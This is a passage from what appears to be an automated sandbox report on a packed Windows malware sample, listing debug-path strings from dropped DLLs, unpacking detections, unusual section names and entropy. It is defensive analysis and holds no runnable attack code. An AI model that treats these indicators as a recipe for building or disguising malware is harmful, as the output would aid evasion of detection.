                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
                      Source: Binary string: C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
                      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeUnpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeUnpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack
                      Source: ucrtbase.dll.1.drStatic PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004317EF LoadLibraryA,GetProcAddress,FreeLibrary,1_2_004317EF
                      Source: sqlite3.dll.1.drStatic PE information: section name: /4
                      Source: sqlite3.dll.1.drStatic PE information: section name: /19
                      Source: sqlite3.dll.1.drStatic PE information: section name: /31
                      Source: sqlite3.dll.1.drStatic PE information: section name: /45
                      Source: sqlite3.dll.1.drStatic PE information: section name: /57
                      Source: sqlite3.dll.1.drStatic PE information: section name: /70
                      Source: sqlite3.dll.1.drStatic PE information: section name: /81
                      Source: sqlite3.dll.1.drStatic PE information: section name: /92
                      Source: AccessibleHandler.dll.1.drStatic PE information: section name: .orpc
                      Source: AccessibleMarshal.dll.1.drStatic PE information: section name: .orpc
                      Source: IA2Marshal.dll.1.drStatic PE information: section name: .orpc
                      Source: lgpllibs.dll.1.drStatic PE information: section name: .rodata
                      Source: MapiProxy.dll.1.drStatic PE information: section name: .orpc
                      Source: MapiProxy_InUse.dll.1.drStatic PE information: section name: .orpc
                      Source: mozglue.dll.1.drStatic PE information: section name: .didat
                      Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0046C54A pushad ; retf 1_2_0046C701
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0046C702 pushad ; retf 1_2_0046C701
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.91913577979